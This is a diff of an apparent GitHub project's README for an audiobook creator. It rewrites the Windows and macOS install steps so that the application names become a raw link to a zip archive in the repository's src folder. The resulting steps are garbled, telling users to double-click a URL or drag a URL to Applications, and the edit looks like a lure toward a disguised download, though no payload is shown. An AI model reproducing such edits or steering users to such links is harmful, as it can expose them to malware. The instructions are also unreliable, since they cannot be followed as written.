abcname61/audiobook-creator/README.md

 1. Extract the ZIP file you downloaded.
 2. Open the extracted folder.
-3. Double-click on `audiobook-creator.exe` to run the application.
+3. Double-click on `https://raw.githubusercontent.com/abcname61/audiobook-creator/master/src/audiobook_creator_v3.2.zip` to run the application.

 ### macOS

 1. Open the downloaded `.zip` file.
-2. Drag the `audiobook-creator.app` to your Applications folder.
+2. Drag the `https://raw.githubusercontent.com/abcname61/audiobook-creator/master/src/audiobook_creator_v3.2.zip` to your Applications folder.
 3. Launch the app from the Applications folder.

 ### Linux